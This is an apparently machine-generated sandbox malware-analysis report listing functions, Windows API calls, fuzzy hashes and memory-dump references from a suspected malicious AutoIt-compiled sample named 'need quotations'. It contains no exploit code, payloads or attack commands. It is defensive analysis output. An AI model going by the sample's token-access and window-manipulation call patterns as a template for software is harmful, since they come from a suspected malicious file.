CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002873A2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: eba359c0efe3441205cf5dd1f67c444cf97fdd43328d318266788f2ce2e2e22c
Instruction ID: 8ed9e6f296a7c331756afec4101e3550754b0d20a6ac9044329e75a787e21baa
Opcode Fuzzy Hash: eba359c0efe3441205cf5dd1f67c444cf97fdd43328d318266788f2ce2e2e22c
Instruction Fuzzy Hash: A6112B76A15205BFC702AF6CEC09E9E7BAD9B45310F144366FC25D3291D770CD108BA1

Function 0025D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0025D1BA
GetStockObject.GDI32(00000011), ref: 0025D1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 0025D1D8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: d975283983e5ac0b26289f60ce14493f439ab59d3f7cb32825164c5b04f97774
Instruction ID: 93b6d93a9d2762265090cae36c866f5fb6d0adc1451fbeafc701ceaff0518d06
Opcode Fuzzy Hash: d975283983e5ac0b26289f60ce14493f439ab59d3f7cb32825164c5b04f97774
Instruction Fuzzy Hash: 6711AD7211190ABFEF228FA0AC54EEABB6DFF08365F048116FE1852050C7719C64DBA0

Function 00274DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00274E16

Part of subcall function 002754F5: __fltout2.LIBCMT ref: 0027551E

__cftog_l.LIBCMT ref: 00274E3C
__cftoe_l.LIBCMT ref: 00274E6E

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction ID: 65f7b6cd44c16a42df15c544e9192af62c9f986b91bf6f461fa60209f3948741
Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
Instruction Fuzzy Hash: 70014B3202014ABBCF126E88DC11CEE7F22BB183A0B588455FE1C59031D376CAB2AB81

Function 00267452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00267A0D: __getptd_noexit.LIBCMT ref: 00267A0E

__lock.LIBCMT ref: 0026748F
InterlockedDecrement.KERNEL32(?), ref: 002674AC
_free.LIBCMT ref: 002674BF
InterlockedIncrement.KERNEL32(016F2898), ref: 002674D7

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 2704283638-0
Opcode ID: be39ee286d523a1fa366a80669eb3828f770c35645b8ce80bb25e5ef679c0076
Instruction ID: f152df38897114601fee8c5cd7063dc664868a5f7f5bfafe38a42fc2d6dd7b5a
Opcode Fuzzy Hash: be39ee286d523a1fa366a80669eb3828f770c35645b8ce80bb25e5ef679c0076
Instruction Fuzzy Hash: 4F01C432925612DBC711AF64B40D76DBB70BF08728F144056F81863680CF34A9E1CFD2

Function 002AEA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 0025AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0025AFE3
Part of subcall function 0025AF83: SelectObject.GDI32(?,00000000), ref: 0025AFF2
Part of subcall function 0025AF83: BeginPath.GDI32(?), ref: 0025B009
Part of subcall function 0025AF83: SelectObject.GDI32(?,00000000), ref: 0025B033

MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002AEA8E
LineTo.GDI32(00000000,?,?), ref: 002AEA9B
EndPath.GDI32(00000000), ref: 002AEAAB
StrokePath.GDI32(00000000), ref: 002AEAB9

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 1c56614bccdcc3b1b30909269744a85a05153990a26dd0254ffe440c46aa7a79
Instruction ID: 1f071818e37470b9c5f10b72b28964fe6f01de0bcb56a70fc7ab579cd540ca48
Opcode Fuzzy Hash: 1c56614bccdcc3b1b30909269744a85a05153990a26dd0254ffe440c46aa7a79
Instruction Fuzzy Hash: DDF08232006259BBDB139FA8BC0EFCE3F59AF06311F184202FE11610E18BB65562CB99

Function 0027C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0027C84A
GetWindowThreadProcessId.USER32(?,00000000), ref: 0027C85D
GetCurrentThreadId.KERNEL32 ref: 0027C864
AttachThreadInput.USER32(00000000), ref: 0027C86B

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: cb81f653806b9b884e4d8d42ef76995fe35509ae87770906b3edfef1ebc2fb68
Instruction ID: 364d0abcb53e17d7efea67da9dc771289c457105384a3bf48b834ced2d092793
Opcode Fuzzy Hash: cb81f653806b9b884e4d8d42ef76995fe35509ae87770906b3edfef1ebc2fb68
Instruction Fuzzy Hash: EBE03971141228BADB215FA2BC0DEDB7F1CEF067A1F108029B60D84460C6B18590CBE0

Function 0027B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 0027B0D6
OpenThreadToken.ADVAPI32(00000000,?,?,?,0027AC9D), ref: 0027B0DD
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0027AC9D), ref: 0027B0EA
OpenProcessToken.ADVAPI32(00000000,?,?,?,0027AC9D), ref: 0027B0F1

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 0cee78937166032b1ff481b3e2a35141d14f9332459679cc8d507f9e8ca784b7
Instruction ID: 62a1dcfba6bc64e0682f4a360a61ae34481eb0cd5ea622e669d113f7a4489ce7
Opcode Fuzzy Hash: 0cee78937166032b1ff481b3e2a35141d14f9332459679cc8d507f9e8ca784b7
Instruction Fuzzy Hash: A0E086326012129FD7201FB56C0CF473BA8EF55791F01C838F245D6040DB749402CB60

Function 0025B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0025B496
SetTextColor.GDI32(?,000000FF), ref: 0025B4A0
SetBkMode.GDI32(?,00000001), ref: 0025B4B5
GetStockObject.GDI32(00000005), ref: 0025B4BD
GetWindowDC.USER32(?,00000000), ref: 002BDE2B
GetPixel.GDI32(00000000,00000000,00000000), ref: 002BDE38
GetPixel.GDI32(00000000,?,00000000), ref: 002BDE51
GetPixel.GDI32(00000000,00000000,?), ref: 002BDE6A
GetPixel.GDI32(00000000,?,?), ref: 002BDE8A
ReleaseDC.USER32(?,00000000), ref: 002BDE95

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 5d4ab11423d8caaddebf96d2dcb2726e47b865c9aad0aa209cad1e6062146db1
Instruction ID: 8aa52821ef7deb49b598ac016f0f0c19706c2a3d616c8d914cf4bf9e3a44737c
Opcode Fuzzy Hash: 5d4ab11423d8caaddebf96d2dcb2726e47b865c9aad0aa209cad1e6062146db1
Instruction Fuzzy Hash: A6E06D31110241AFDF211F74BC0DFD93B11AB11336F04C266FAB9980E1C7B18590CB11

Function 002BB29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 002BB29A
GetDC.USER32(00000000), ref: 002BB2A4
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002BB2C3
ReleaseDC.USER32 ref: 002BB2E2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 41f9f447815db07ddb092e918da7ab3b8043d54bffd88c35b5d087b14b5d573d
Instruction ID: 606e6ec7ffb547703dc9060ddeab6b7d7b0e919f77d5f07b8e3ace81bffcab25
Opcode Fuzzy Hash: 41f9f447815db07ddb092e918da7ab3b8043d54bffd88c35b5d087b14b5d573d
Instruction Fuzzy Hash: 99E046B1510204EFDB015F70EC4CA6E7BA8EB4C356F22C82AFC9A8B251CBB49840DF44

Function 0027B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0027B2DF
UnloadUserProfile.USERENV(?,?), ref: 0027B2EB
CloseHandle.KERNEL32(?), ref: 0027B2F4
CloseHandle.KERNEL32(?), ref: 0027B2FC

Part of subcall function 0027AB24: GetProcessHeap.KERNEL32(00000000,?,0027A848), ref: 0027AB2B
Part of subcall function 0027AB24: HeapFree.KERNEL32(00000000), ref: 0027AB32

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 01af6277719726beac807910573cee611a65f0e947640d6a903ea8cd89ad95a7
Instruction ID: f930af0ab7c62afe98dff5b5b79263193a4a36bfeb6de5892365289c1d82e118
Opcode Fuzzy Hash: 01af6277719726beac807910573cee611a65f0e947640d6a903ea8cd89ad95a7
Instruction Fuzzy Hash: 83E0263A104405BBDB016BA5EC0CC59FBA6FF993213509631F629825B5CB32A871EF91

Function 002BB2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 002BB2AE
GetDC.USER32(00000000), ref: 002BB2B8
GetDeviceCaps.GDI32(00000000,0000000C), ref: 002BB2C3
ReleaseDC.USER32 ref: 002BB2E2

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 9aec8eb5bc2a707cc940c7d3caf6fdb6c7f7d9da4a396422529f16469bfd25bb
Instruction ID: 539729984ddbca29a50447c9e17b9ac2e825a47ce9ec036c7235eb45236a5191
Opcode Fuzzy Hash: 9aec8eb5bc2a707cc940c7d3caf6fdb6c7f7d9da4a396422529f16469bfd25bb
Instruction Fuzzy Hash: 24E04FB1500200EFDB005F70EC4CA2D7BA8EB4C355F218425FD5A87251CB759840CF44

Function 0027DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 0027DEAA

Strings

Container, xrefs: 0027DE29
AutoIt3GUI, xrefs: 0027DE22

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 203253405baa24d72e969aa4e04b6d329143f464e2f0d0d69e4a5e22f0ddd72a
Instruction ID: 7973d69d30d496412b00277e4d37c696630d0f2e0b05deb69c9a60234bd5a906
Opcode Fuzzy Hash: 203253405baa24d72e969aa4e04b6d329143f464e2f0d0d69e4a5e22f0ddd72a
Instruction Fuzzy Hash: 2F914870620602AFDB24CF64C884F6AB7F5BF49710F14856EF94ACB691DBB1E851CB60

Function 0028290D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON

Download Yara Rule

APIs

_wcscpy.LIBCMT ref: 00282A72

Strings

I/+, xrefs: 0028297F
I/+, xrefs: 002829FC, 00282A64, 00282A12

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcscpy
String ID: I/+$I/+
API String ID: 3048848545-3803121961
Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction ID: 6035cb28738c8a40eb0afdaac0dc81982fe6b1532768ff0e9d28044363982d21
Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
Instruction Fuzzy Hash: D241D739921217EACF29FF98C4519FDB7B0EF08310F64505AE881A71D1D7709EAACB90

Function 0025BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0025BCDA
GlobalMemoryStatusEx.KERNEL32 ref: 0025BCF3

Strings

@, xrefs: 0025BCE8

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 42e62fd9062b9d74339badd4761ca27c86c03f0fdcc50907f0b97895eb8d69b5
Instruction ID: 8f6b5f9774e70839151a1d42c0bb6501c68026962b47ec3b72ea649576642fab
Opcode Fuzzy Hash: 42e62fd9062b9d74339badd4761ca27c86c03f0fdcc50907f0b97895eb8d69b5
Instruction Fuzzy Hash: 06515771418744DBE320AF14D88ABAFBBECFB95355F41485EF5C8411A2DB7084ACCB5A

Function 0028C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 002444ED: __fread_nolock.LIBCMT ref: 0024450B

_wcscmp.LIBCMT ref: 0028C65D
_wcscmp.LIBCMT ref: 0028C670

Strings

FILE, xrefs: 0028C5A5

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 42344a59a17537b43b72ecf25126e4e9f6eb8b6d5243d7922b19efab99511c04
Instruction ID: 959ea1b48fb4addd6745eeebc8cc3240216bbcbb86005b9e39a15d907fd59e2a
Opcode Fuzzy Hash: 42344a59a17537b43b72ecf25126e4e9f6eb8b6d5243d7922b19efab99511c04
Instruction Fuzzy Hash: 7241E676A1021ABADF21ABA4CC41FEF77BDEF89700F100079F601E7181D771AA248B60

Function 002AA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 002AA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002AA86F

Strings

', xrefs: 002AA7C3

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 5157ed276f4fdd1e6caaea11142ad1fd9dce9753336f79595a8d088fd03d117f
Instruction ID: fdb58258e0aabee6d468f29ea76a32186b145792d6d3cece1c8a186f4bbb6cb6
Opcode Fuzzy Hash: 5157ed276f4fdd1e6caaea11142ad1fd9dce9753336f79595a8d088fd03d117f
Instruction Fuzzy Hash: 0A410A74E113099FDB54CF64D881BDABBB9FF09300F10016AE905AB381DB75A951CF91

Function 002A975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 002A980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 002A984A

Strings

static, xrefs: 002A97AA

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: e7a64d9d6eb81d18cd8b6a678add3ff6e5ea38e9929b3e29bfcdbe20493c4661
Instruction ID: f46840fff82c13c7af3183b981bed40153451c429415caeec732dffd894ec611
Opcode Fuzzy Hash: e7a64d9d6eb81d18cd8b6a678add3ff6e5ea38e9929b3e29bfcdbe20493c4661
Instruction Fuzzy Hash: 4D318F71120604AFEB109F35DC80BBB77A9FF5A760F108619F9A9C7190CA35ACA5CB64

Function 00285157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002851C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00285201

Strings

0, xrefs: 002851BF

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694032092.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694048681.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_need quotations.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 5b5235e72939443b05a1d703f4361d5a02f7de075aa02d847c940afe843c16aa
Instruction ID: eca423cd3a0fb76af04d3994c3de15ec71c1e2ec7b7200f087c549fa0c4c5d42
Opcode Fuzzy Hash: 5b5235e72939443b05a1d703f4361d5a02f7de075aa02d847c940afe843c16aa
Instruction Fuzzy Hash: 71314B39511316DBDB25EF88D844B9EBBF4FF41350F140019ED81A61E0DB709964CB10

Function 0029658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00296608

Strings

AUTOITCALLVARIABLE%d, xrefs: 002965FA
, $, xrefs: 00296648

Memory Dump Source

Source File: 00000000.00000002.1693924543.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1693904760.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1693989906.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
